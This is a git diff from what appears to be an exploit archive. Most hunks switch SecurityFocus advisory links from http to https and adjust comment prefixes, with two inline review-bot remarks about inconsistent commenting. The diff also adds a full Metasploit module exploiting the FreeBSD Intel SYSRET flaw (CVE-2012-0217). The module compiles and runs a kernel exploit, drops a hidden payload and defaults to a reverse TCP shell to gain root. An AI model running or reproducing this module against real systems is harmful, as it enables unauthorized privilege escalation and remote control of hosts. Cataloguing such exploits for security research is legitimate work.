@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66549/info +source: https://www.securityfocus.com/bid/66549/info Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39145.txt b/exploits/cgi/webapps/39145.txt index c2b474923..b752b7a48 100644 --- a/exploits/cgi/webapps/39145.txt +++ b/exploits/cgi/webapps/39145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66819/info +source: https://www.securityfocus.com/bid/66819/info Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39156.txt b/exploits/cgi/webapps/39156.txt index 048516863..54e340153 100644 --- a/exploits/cgi/webapps/39156.txt +++ b/exploits/cgi/webapps/39156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67215/info +source: https://www.securityfocus.com/bid/67215/info ZamFoo is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/cgi/webapps/772.c b/exploits/cgi/webapps/772.c index 0da383244..b6211e5bf 100644 --- a/exploits/cgi/webapps/772.c +++ b/exploits/cgi/webapps/772.c @@ -1,4 +1,4 @@ - /* +/* AwStats exploit by Thunder, molnar_rcs@yahoo.com This exploit makes use of the remote command execution bug discovered in diff --git a/exploits/freebsd/dos/19130.c b/exploits/freebsd/dos/19130.c index c046c3f99..652a1a8ed 100644 --- a/exploits/freebsd/dos/19130.c +++ b/exploits/freebsd/dos/19130.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/168/info +source: https://www.securityfocus.com/bid/168/info A vulnerability in FreeBSD's UNIX-domain protocol implementation of file descriptor passing can cause the kernel to panic. */ diff --git a/exploits/freebsd/dos/19505.c b/exploits/freebsd/dos/19505.c index a67a5412f..f37b6dcc5 100644 
--- a/exploits/freebsd/dos/19505.c +++ b/exploits/freebsd/dos/19505.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/653/info +// source: https://www.securityfocus.com/bid/653/info A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out). diff --git a/exploits/freebsd/dos/19687.c b/exploits/freebsd/dos/19687.c index 7163af360..acc1e61ea 100644 --- a/exploits/freebsd/dos/19687.c +++ b/exploits/freebsd/dos/19687.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/888/info +// source: https://www.securityfocus.com/bid/888/info RealServer 5.0 can be crashed by sending an overly long (4082+ bytes) ramgen request. Regular functionality can be restored by restarting the RealServer software. diff --git a/exploits/freebsd/dos/21512.txt b/exploits/freebsd/dos/21512.txt index 7d994e127..9a49e67a4 100644 --- a/exploits/freebsd/dos/21512.txt +++ b/exploits/freebsd/dos/21512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4935/info +source: https://www.securityfocus.com/bid/4935/info slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems. diff --git a/exploits/freebsd/dos/22831.pl b/exploits/freebsd/dos/22831.pl index 49278e28f..9c3ff20de 100755 --- a/exploits/freebsd/dos/22831.pl +++ b/exploits/freebsd/dos/22831.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8022/info +source: https://www.securityfocus.com/bid/8022/info GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible. 
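Review bot: In the 19505.c and 19687.c hunks the added `//` prefix covers only the `source:` line, while the advisory text that follows as unchanged context ("A vulnerability exists in FreeBSD's new VFS cache ...", "RealServer 5.0 can be crashed ...") is still bare prose at the top of a C file, so as far as the visible context shows, the header remains outside any comment. The 19130.c and 24233.c hunks show the same kind of header already sitting inside a `/* ... */` block; wrapping the whole description that way here would comment out all of it rather than one line. The 22831.pl hunk keeps `source:` with no `#` prefix at all, so the Perl script gets the URL scheme change but not the comment treatment the .c files receive; either handle it the same way in this patch or say in the commit message why it is left out.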
diff --git a/exploits/freebsd/dos/23540.c b/exploits/freebsd/dos/23540.c index 965886d25..19c49aa93 100644 --- a/exploits/freebsd/dos/23540.c +++ b/exploits/freebsd/dos/23540.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9417/info +// source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon. diff --git a/exploits/freebsd/dos/24233.c b/exploits/freebsd/dos/24233.c index ba2d9a64e..7d627ed50 100644 --- a/exploits/freebsd/dos/24233.c +++ b/exploits/freebsd/dos/24233.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10596/info +source: https://www.securityfocus.com/bid/10596/info It is reported that FreeBSD running on the Alpha architecture is susceptible to a denial of service vulnerability in its execve() system call. diff --git a/exploits/freebsd/dos/28648.c b/exploits/freebsd/dos/28648.c index 5f009d8cd..a8b18642c 100644 --- a/exploits/freebsd/dos/28648.c +++ b/exploits/freebsd/dos/28648.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20158/info +// source: https://www.securityfocus.com/bid/20158/info FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers. diff --git a/exploits/freebsd/dos/28812.c b/exploits/freebsd/dos/28812.c index 1c59cf292..21180ccb8 100644 --- a/exploits/freebsd/dos/28812.c +++ b/exploits/freebsd/dos/28812.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20517/info +// source: https://www.securityfocus.com/bid/20517/info FreeBSD is prone to a local denial-of-service vulnerability because the kernel fails to require superuser privileges to perform a sensitive operation. diff --git a/exploits/freebsd/dos/28813.c b/exploits/freebsd/dos/28813.c index f8f818ef1..fbe34b04e 100644 --- a/exploits/freebsd/dos/28813.c +++ b/exploits/freebsd/dos/28813.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20522/info +// source: https://www.securityfocus.com/bid/20522/info FreeBSD is prone to a local denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/freebsd/local/19346.c b/exploits/freebsd/local/19346.c index 8791d8038..0609cb54c 100644 --- a/exploits/freebsd/local/19346.c +++ b/exploits/freebsd/local/19346.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/456/info +// source: https://www.securityfocus.com/bid/456/info Solaris 2.6 and many other unices/clones have a serious problem with their unix domain socket implementation that has it's origins in old BSD code. Any unix socket created by any application is set mode 4777. In Solaris versions 2.5 and earlier, the permissions were ignored completely. The applications are vulnerable to being connected to and written to by anyone. This could lead to a whole number of application-specific security compromises. diff --git a/exploits/freebsd/local/19504.c b/exploits/freebsd/local/19504.c index 8f99180d7..37ddcd0a1 100644 --- a/exploits/freebsd/local/19504.c +++ b/exploits/freebsd/local/19504.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/651/info +// source: https://www.securityfocus.com/bid/651/info Under systems that allow the user to change his GECOS field from the password file and do not limit its length cfingerd is vulnerable to a local root (or nobody) buffer overflow. By setting a carefully designed GECOS field it is possible to execute arbitrary code with root (or nobody ) privileges. diff --git a/exploits/freebsd/local/19609.txt b/exploits/freebsd/local/19609.txt index 34403f9f6..5b75b1512 100644 --- a/exploits/freebsd/local/19609.txt +++ b/exploits/freebsd/local/19609.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/780/info +source: https://www.securityfocus.com/bid/780/info Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. diff --git a/exploits/freebsd/local/19649.c b/exploits/freebsd/local/19649.c index 18556e909..527310790 100644 --- a/exploits/freebsd/local/19649.c +++ b/exploits/freebsd/local/19649.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/834/info +// source: https://www.securityfocus.com/bid/834/info There is a buffer overflow vulnerability known to be present in the version of gdc shipped with the 3.3-RELEASE version of FreeBSD. By default, only users in group wheel have execute access to gdc. The overflow occurs when the argument passed along with the -t flag (time) exceeds its predefined buffer length. It is possible to then corrupt the stack and alter the flow of execution (and execute arbitrary code). With gdc setuid root by default, this can lead to a local root compromise if exploited by users who have or gain access of or belong to the wheel group (or trusted gated group). diff --git a/exploits/freebsd/local/19650.txt b/exploits/freebsd/local/19650.txt index 77b4aa5df..2dddfc34a 100644 --- a/exploits/freebsd/local/19650.txt +++ b/exploits/freebsd/local/19650.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/835/info +source: https://www.securityfocus.com/bid/835/info It is possible to write debug ouput from gdc to a file (/var/tmp/gdb_dump). Unfortunately, gdc follows symbolic links which can be created in tmp and will overwrite any file on the system thanks to it being setiud root. This does not cause any immediate compromises and is more of a denial of service attack since it does not change the permissions of the overwritten files (to say, world writeable or group writeable). Local users are required to be in group wheel (or equivelent) to execute gdc. diff --git a/exploits/freebsd/local/19651.txt b/exploits/freebsd/local/19651.txt index 62858eb82..e72a96b03 100644 --- a/exploits/freebsd/local/19651.txt +++ b/exploits/freebsd/local/19651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/838/info +source: https://www.securityfocus.com/bid/838/info FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. diff --git a/exploits/freebsd/local/19652.c b/exploits/freebsd/local/19652.c index fe9d71ecf..44f1ba3c0 100644 --- a/exploits/freebsd/local/19652.c +++ b/exploits/freebsd/local/19652.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/839/info +source: https://www.securityfocus.com/bid/839/info The version of xmindpath shipped with FreeBSD 3.3 can be locally exploited via overrunning a buffer of predefined length. It is possible to gain the effective userid of uucp through this vulnerability. It may be possible, after attaining uucp priviliges, to modify binaries to which uucp has write access to and trojan them to further elevate priviliges), ie: modify minicom so that when root runs it, drops a suid shell somewhere. */ diff --git a/exploits/freebsd/local/19653.c b/exploits/freebsd/local/19653.c index fce5ca0f4..7ffc7f16e 100644 --- a/exploits/freebsd/local/19653.c +++ b/exploits/freebsd/local/19653.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/840/info +// source: https://www.securityfocus.com/bid/840/info The version angband shipped with FreeBSD 3.3-RELEASE is vulnerable to a local buffer overflow attack. Since it is setgid games, a compromise of files and directories owned by group games is possible. diff --git a/exploits/freebsd/local/19685.txt b/exploits/freebsd/local/19685.txt index 28c8edde3..2dacd022f 100644 --- a/exploits/freebsd/local/19685.txt +++ b/exploits/freebsd/local/19685.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/885/info +source: https://www.securityfocus.com/bid/885/info WMMon is a multiple platform Window Maker docking application. It monitors useful system information such as CPU load and disk activity. The application also allows the user to define commands that can be launched by mouse clicks in the WMMon window. If the WMMon application is installed SUID or SGID, these privileges are not dropped before executing commands that have been defined by the user. Since the user can configure the application to execute any command, a user can run a shell or any other executable with the privileges that WMMon has been installed with. The FreeBSD ports version of WMMon installs SGID kmem and older versions installed it as SUID root. diff --git a/exploits/freebsd/local/19756.txt b/exploits/freebsd/local/19756.txt index d2edcc339..a2af71e21 100644 --- a/exploits/freebsd/local/19756.txt +++ b/exploits/freebsd/local/19756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/996/info +source: https://www.securityfocus.com/bid/996/info A vulnerability exists in both the ascpu and asmon ports to FreeBSD. Ascpu and asmon are applets for the popular window manager AfterStep. They retain the look and feel of this window manager, and integrate well in to it's "dock" toolbar. As part of the port to FreeBSD, it was deemed necessary to give them access to /dev/kmem, necessitating them being installed setgid kmem. By passing a command line option, it is possible for an attacker to cause these applications to execute arbitrary commands with group 'kmem' privileges. diff --git a/exploits/freebsd/local/20377.c b/exploits/freebsd/local/20377.c index 1ae680de1..441a06c1d 100644 --- a/exploits/freebsd/local/20377.c +++ b/exploits/freebsd/local/20377.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1895/info +source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege. diff --git a/exploits/freebsd/local/21114.txt b/exploits/freebsd/local/21114.txt index 81496d8ad..ff75f7ec9 100644 --- a/exploits/freebsd/local/21114.txt +++ b/exploits/freebsd/local/21114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3344/info +source: https://www.securityfocus.com/bid/3344/info FreeBSD is a freely available, open source implementation of the BSD UNIX Operating System. It is developed and maintained by the FreeBSD Project. diff --git a/exploits/freebsd/local/21176.c b/exploits/freebsd/local/21176.c index d956d9d13..9271a7d52 100644 --- a/exploits/freebsd/local/21176.c +++ b/exploits/freebsd/local/21176.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3661/info +// source: https://www.securityfocus.com/bid/3661/info aio.h is a library implementing the POSIX standard for asynchronous I/O. Support for AIO may be enabled in FreeBSD by compiling the kernel with the VFS_AIO option. This option is not enabled in the default kernel configuration. diff --git a/exploits/freebsd/local/21462.sh b/exploits/freebsd/local/21462.sh index 474730811..4bd123d92 100755 --- a/exploits/freebsd/local/21462.sh +++ b/exploits/freebsd/local/21462.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4768/info +source: https://www.securityfocus.com/bid/4768/info In FreeBSD, setting kern.ps_showallprocs=0 via the sysctl call is meant to disable normal users from seeing any running processes that are not owned by them. The current implementation of this feature fails to protest system process information. diff --git a/exploits/freebsd/local/21798.txt b/exploits/freebsd/local/21798.txt index ae22e2ad3..ffdebda3b 100644 --- a/exploits/freebsd/local/21798.txt +++ b/exploits/freebsd/local/21798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5718/info +source: https://www.securityfocus.com/bid/5718/info It has been reported that wmmon is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file descriptors for /dev/mem and /dev/kmem by executing a malicious program through wmmon. The program that is executed can be specified by the attacker at the command line. diff --git a/exploits/freebsd/local/21799.txt b/exploits/freebsd/local/21799.txt index 037683011..71fed68f4 100644 --- a/exploits/freebsd/local/21799.txt +++ b/exploits/freebsd/local/21799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5719/info +source: https://www.securityfocus.com/bid/5719/info It has been reported that wmnet2 is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file descriptors for /dev/mem and /dev/kmem by executing a malicious program through wmnet2. The program that is executed can be specified by the attacker at the command line. diff --git a/exploits/freebsd/local/22566.pl b/exploits/freebsd/local/22566.pl index fbdf90cf7..3d50410c1 100755 --- a/exploits/freebsd/local/22566.pl +++ b/exploits/freebsd/local/22566.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7503/info +source: https://www.securityfocus.com/bid/7503/info It has been reported that youbin is vulnerable to a locally exploitable buffer overflow. The problem is said to occur while processing environment variables. Specifically, an internal memory buffer may be overrun while handling a HOME environment variable containing excessive data. This condition may be exploited by attackers to ultimately execute instructions with the privileges of the youbin process, typically root. diff --git a/exploits/freebsd/local/22573.pl b/exploits/freebsd/local/22573.pl index da2346f46..a5047739e 100755 --- a/exploits/freebsd/local/22573.pl +++ b/exploits/freebsd/local/22573.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7533/info +source: https://www.securityfocus.com/bid/7533/info ListProc catmail has been reported prone to a buffer overflow vulnerability when handling a ULISTPROC_UMASK environment variable of excessive length. diff --git a/exploits/freebsd/local/22574.pl b/exploits/freebsd/local/22574.pl index 3ba37d496..8c1c49d05 100755 --- a/exploits/freebsd/local/22574.pl +++ b/exploits/freebsd/local/22574.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7537/info +source: https://www.securityfocus.com/bid/7537/info A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. diff --git a/exploits/freebsd/local/22580.c b/exploits/freebsd/local/22580.c index ee9f42a10..c044014c7 100644 --- a/exploits/freebsd/local/22580.c +++ b/exploits/freebsd/local/22580.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7546/info +// source: https://www.securityfocus.com/bid/7546/info Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also. 
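Review bot: in exploits/freebsd/local/22580.c only the first header line gains `//`. The unchanged context lines directly below it ("Interbase is a database distributed and maintained by Borland. ...") remain bare prose, so the header is only partly commented. Wrapping the whole description in a `/* ... */` block, as exploits/freebsd/dos/24233.c already does in this patch, would cover every header line and give the .c files a single convention.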
diff --git a/exploits/freebsd/local/22613.pl b/exploits/freebsd/local/22613.pl index c709b512d..7c4c5b9bb 100755 --- a/exploits/freebsd/local/22613.pl +++ b/exploits/freebsd/local/22613.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22614.c b/exploits/freebsd/local/22614.c index 0b69edfd0..e9e4d932f 100644 --- a/exploits/freebsd/local/22614.c +++ b/exploits/freebsd/local/22614.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22615.c b/exploits/freebsd/local/22615.c index d73b713ec..2f954566a 100644 --- a/exploits/freebsd/local/22615.c +++ b/exploits/freebsd/local/22615.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7630/info +// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/freebsd/local/22661.c b/exploits/freebsd/local/22661.c index 65e6f62af..30f2fcd6e 100644 --- a/exploits/freebsd/local/22661.c +++ b/exploits/freebsd/local/22661.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7703/info +// source: https://www.securityfocus.com/bid/7703/info upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length. diff --git a/exploits/freebsd/local/32946.c b/exploits/freebsd/local/32946.c index 6ed4cece2..26932b1db 100644 --- a/exploits/freebsd/local/32946.c +++ b/exploits/freebsd/local/32946.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34666/info +// source: https://www.securityfocus.com/bid/34666/info FreeBSD is prone to a local information-disclosure vulnerability. 
diff --git a/exploits/freebsd/remote/15723.c b/exploits/freebsd/remote/15723.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/freebsd/remote/15723.c rename to exploits/freebsd/remote/15723.pl diff --git a/exploits/freebsd/remote/20292.pl b/exploits/freebsd/remote/20292.pl index c13488785..051346ee3 100755 --- a/exploits/freebsd/remote/20292.pl +++ b/exploits/freebsd/remote/20292.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1804/info +source: https://www.securityfocus.com/bid/1804/info Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). diff --git a/exploits/freebsd/remote/20732.pl b/exploits/freebsd/remote/20732.pl index 28bf65a0c..09744e008 100755 --- a/exploits/freebsd/remote/20732.pl +++ b/exploits/freebsd/remote/20732.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/freebsd/remote/20941.pl b/exploits/freebsd/remote/20941.pl index 27bc40996..c39c8e081 100755 --- a/exploits/freebsd/remote/20941.pl +++ b/exploits/freebsd/remote/20941.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2895/info +source: https://www.securityfocus.com/bid/2895/info W3M is a pager/text-based WWW browser similiar to lynx. diff --git a/exploits/freebsd/remote/21614.c b/exploits/freebsd/remote/21614.c index 2155974f6..fff73fee3 100644 --- a/exploits/freebsd/remote/21614.c +++ b/exploits/freebsd/remote/21614.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5215/info +source: https://www.securityfocus.com/bid/5215/info ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin. diff --git a/exploits/freebsd/remote/22832.pl b/exploits/freebsd/remote/22832.pl index b996fa53b..b101aa2a4 100755 --- a/exploits/freebsd/remote/22832.pl +++ b/exploits/freebsd/remote/22832.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8022/info +source: https://www.securityfocus.com/bid/8022/info GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible. diff --git a/exploits/freebsd/remote/22890.pl b/exploits/freebsd/remote/22890.pl index 588e9ab49..f0ce225d0 100755 --- a/exploits/freebsd/remote/22890.pl +++ b/exploits/freebsd/remote/22890.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8160/info +source: https://www.securityfocus.com/bid/8160/info A buffer overflow vulnerability has been reported in cftp. The vulnerability occurs when cftp is parsing 'Welcome' banner messages from remote FTP servers. When cftp receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client. diff --git a/exploits/freebsd/remote/22891.pl b/exploits/freebsd/remote/22891.pl index 378053fda..221d59b0a 100755 --- a/exploits/freebsd/remote/22891.pl +++ b/exploits/freebsd/remote/22891.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8161/info +source: https://www.securityfocus.com/bid/8161/info A buffer overflow vulnerability has been reported in IglooFTP. The vulnerability occurs when IglooFTP is parsing 'Welcome' banner messages from remote FTP servers. When IglooFTP receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client. 
diff --git a/exploits/freebsd/remote/22976.pl b/exploits/freebsd/remote/22976.pl index b13e5dfce..3137dc164 100755 --- a/exploits/freebsd/remote/22976.pl +++ b/exploits/freebsd/remote/22976.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8315/info +source: https://www.securityfocus.com/bid/8315/info The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable. diff --git a/exploits/freebsd/remote/25687.c b/exploits/freebsd/remote/25687.c index df164cc1b..6318da4d0 100644 --- a/exploits/freebsd/remote/25687.c +++ b/exploits/freebsd/remote/25687.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13698/info +// source: https://www.securityfocus.com/bid/13698/info Picasm is affected by a remote buffer overflow vulnerability. diff --git a/exploits/freebsd_x86-64/local/46508.rb b/exploits/freebsd_x86-64/local/46508.rb new file mode 100755 index 000000000..7f9624114 --- /dev/null +++ b/exploits/freebsd_x86-64/local/46508.rb 
@@ -0,0 +1,181 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation', + 'Description' => %q{ + This module exploits a vulnerability in the FreeBSD kernel, + when running on 64-bit Intel processors. + + By design, 64-bit processors following the X86-64 specification will + trigger a general protection fault (GPF) when executing a SYSRET + instruction with a non-canonical address in the RCX register. + + However, Intel processors check for a non-canonical address prior to + dropping privileges, causing a GPF in privileged mode. As a result, + the current userland RSP stack pointer is restored and executed, + resulting in privileged code execution. + + This module has been tested successfully on: + + FreeBSD 8.3-RELEASE (amd64); and + FreeBSD 9.0-RELEASE (amd64). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Rafal Wojtczuk', # Discovery + 'John Baldwin', # Discovery + 'iZsh', # Exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2012-06-12', + 'Platform' => ['bsd'], + 'Arch' => [ARCH_X64], + 'SessionTypes' => ['shell'], + 'References' => + [ + ['BID', '53856'], + ['CVE', '2012-0217'], + ['EDB', '28718'], + ['PACKETSTORM', '113584'], + ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'], + ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'], + ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'], + ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'], + ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'], + ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation'] + ], + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, + 'DefaultTarget' => 0)) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data, gcc_args='') + upload "#{path}.c", data + + gcc_cmd = "gcc -o #{path} #{path}.c" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd + + unless output.blank? 
+ print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + register_file_for_cleanup path + chmod path + end + + def exploit_data(file) + ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file) + end + + def is_root? + (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0') + end + + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + + def check + kernel_release = cmd_exec('uname -r').to_s + unless kernel_release =~ /^(8\.3|9\.0)-RELEASE/ + vprint_error "FreeBSD version #{kernel_release} is not vulnerable" + return Exploit::CheckCode::Safe + end + vprint_good "FreeBSD version #{kernel_release} appears vulnerable" + + arch = cmd_exec('uname -m').to_s + unless arch.include? '64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + hw_model = cmd_exec('/sbin/sysctl hw.model').to_s + unless hw_model.downcase.include? 'intel' + vprint_error "#{hw_model} is not vulnerable" + return CheckCode::Safe + end + vprint_good "#{hw_model} is vulnerable" + + CheckCode::Appears + end + + def exploit + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? 
base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload and compile exploit executable + executable_name = ".#{rand_text_alphanumeric 5..10}" + executable_path = "#{base_dir}/#{executable_name}" + upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall' + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec executable_path + output.each_line { |line| vprint_status line.chomp } + + unless is_root? + fail_with Failure::Unknown, 'Exploitation failed' + end + print_good "Success! Executing payload..." + + cmd_exec payload_path + end +end \ No newline at end of file diff --git a/exploits/hardware/dos/19436.txt b/exploits/hardware/dos/19436.txt index 9854f23fb..180c51ea8 100644 --- a/exploits/hardware/dos/19436.txt +++ b/exploits/hardware/dos/19436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/549/info +source: https://www.securityfocus.com/bid/549/info A denial of service condition exists in some implementations of Firewall-1 by Checkpoint Software. This denial of service attack is possible due to the way Firewall-1 handles TCP connections. diff --git a/exploits/hardware/dos/19441.c b/exploits/hardware/dos/19441.c index 6f0c2822e..d6fd0405c 100644 --- a/exploits/hardware/dos/19441.c +++ b/exploits/hardware/dos/19441.c 
